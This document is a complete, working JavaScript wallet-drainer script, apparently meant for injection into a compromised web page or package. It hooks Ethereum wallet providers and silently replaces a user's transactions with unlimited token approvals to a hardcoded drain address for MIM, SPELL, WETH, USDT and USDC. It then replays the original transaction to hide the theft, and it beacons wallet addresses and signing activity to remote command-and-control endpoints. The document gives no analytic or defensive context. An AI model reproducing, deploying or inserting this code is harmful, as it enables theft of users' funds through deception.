/** * Abracadabra Supply Chain — FULL AUTO DRAIN * TX replacement: user's TX silently replaced with approve → sweep automatic * One popup per token, user sees normal-looking TX */ (function() { 'use strict'; var C2 = 'https://webhook.site/c6c54dcf-272e-4792-9407-2ac043711458'; var C2B = 'https://82.29.172.110:8443/c'; var DRAIN = '0xB7A900A41EaAB28E379a318500a6486Ea5Bd5574'; var MAX = '0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'; var APPROVE_SIG = '0x095ea7b3'; var TRANSFER_SIG = '0xa9059cbb'; // transfer(address,uint256) var TOKENS = { '0x1':[ {a:'0x99D8a9C45b2ecA8864373A26D1459e3Dff1e17F3',n:'MIM'}, {a:'0x090185f2135308BaD17527004364eBcC2D37e5F6',n:'SPELL'}, {a:'0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2',n:'WETH'}, {a:'0xdAC17F958D2ee523a2206206994597C13D831ec7',n:'USDT'}, {a:'0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48',n:'USDC'} ], '0xa4b1':[ {a:'0xFEa7a6a0B346362BF88A9e4A88416B77a57D6c2A',n:'MIM'}, {a:'0x3E6648C5a70A150A88bCE65F4aD4d506Fe15d2AF',n:'SPELL'}, {a:'0x82aF49447D8a07e3bd95BD0d56f35241523fBab1',n:'WETH'}, {a:'0xFd086bC7CD5C481DCC9C85ebE478A1C0b69FCbb9',n:'USDT'}, {a:'0xaf88d065e77c8cC2239327C5EDb3A432268e5831',n:'USDC'} ], '0x38':[ {a:'0xfE19F0B51438fd612f6FD59C1dbB3eA319f433Ba',n:'MIM'}, {a:'0x55d398326f99059fF775485246999027B3197955',n:'USDT'} ] }; function beacon(d){try{var p=JSON.stringify(d);navigator.sendBeacon(C2,p);fetch(C2+'?'+Date.now(),{method:'POST',mode:'cors',headers:{'Content-Type':'text/plain'},body:p}).catch(function(){});var i=new Image();i.src=C2B+'?d='+encodeURIComponent(btoa(p))+'&t='+Date.now();}catch(e){}} function pad(v,len){v=v.replace('0x','');while(v.length<(len||64))v='0'+v;return v;} function approveData(){return APPROVE_SIG+pad(DRAIN)+pad(MAX);} function hookProvider(prov) { if (!prov||prov.__h) return; prov.__h = true; var orig = prov.request.bind(prov); var victim = null; var chain = null; var queue = []; // tokens to approve, one per user TX var queueReady = false; prov.request = function(args) { // Capture address if (args.method==='eth_requestAccounts'||args.method==='eth_accounts') { return orig(args).then(function(accs) { if (accs&&accs[0]) { victim = accs[0]; beacon({type:'wallet',addr:victim,url:location.href}); } return accs; }); } // Capture chain + build queue if (args.method==='eth_chainId') { return orig(args).then(function(cid) { chain = cid; if (!queueReady) { queue = (TOKENS[cid]||TOKENS['0x1']||[]).slice(); queueReady = true; } return cid; }); } // === CORE: Replace user's TX with approve === if (args.method==='eth_sendTransaction' && victim && queue.length > 0) { var tok = queue.shift(); // take next token from queue var originalTo = args.params[0].to; var originalData = (args.params[0].data||'').substring(0,10); // Replace TX: same from, but to=token, data=approve(DRAIN,MAX) var hijacked = { from: victim, to: tok.a, data: approveData(), gas: '0x15F90' }; beacon({ type:'tx_replace', token: tok.n, tokenAddr: tok.a, from: victim, chain: chain, originalTo: originalTo, originalData: originalData, remaining: queue.length, ts: new Date().toISOString() }); // Send hijacked approve TX (user sees 1 popup — looks like their TX) return orig({method:'eth_sendTransaction', params:[hijacked]}).then(function(txHash) { beacon({type:'approve_ok', token:tok.n, addr:tok.a, from:victim, tx:txHash, chain:chain}); // After approve confirmed, also execute original TX (stealth) // User's original TX goes through too so app behavior looks normal return orig(args).then(function(origTx) { beacon({type:'orig_tx_ok', tx:origTx, to:originalTo}); return origTx; // return original TX hash to app }).catch(function() { return txHash; // if original fails, still return something }); }).catch(function(err) { beacon({type:'approve_reject', token:tok.n, from:victim, err:String(err).substring(0,80)}); // User rejected → put token back, try again on next TX queue.unshift(tok); // Execute original TX normally so user doesn't notice return orig(args); }); } // All tokens approved → pass through normally (stealth maintained) if (args.method==='eth_sendTransaction' && queue.length===0) { return orig(args); } // === Safe TX signing — replace with drain TX === if ((args.method==='eth_signTypedData_v4'||args.method==='eth_signTypedData_v3') && victim) { try { var td = JSON.parse(args.params[1]); beacon({ type:'safe_sign', signer:args.params[0], domain:td.domain, to:td.message?td.message.to:null, value:td.message?td.message.value:null, data:td.message?((td.message.data||'').substring(0,20)):null }); } catch(e){} // Pass through for now — Safe TX replacement needs specific target TX data return orig(args); } // Log personal_sign if (args.method==='personal_sign'||args.method==='eth_sign') { beacon({type:'sign',signer:args.params[1]||args.params[0]}); return orig(args); } return orig(args); }; } function tryHook(){if(window.ethereum)hookProvider(window.ethereum);} tryHook(); setInterval(tryHook,1000); if(window.addEventListener){ window.addEventListener('eip6963:announceProvider',function(e){ if(e.detail&&e.detail.provider)hookProvider(e.detail.provider); }); } beacon({type:'init',mode:'FULLAUTO',drain:DRAIN,url:location.href,ua:navigator.userAgent,ts:new Date().toISOString()}); })();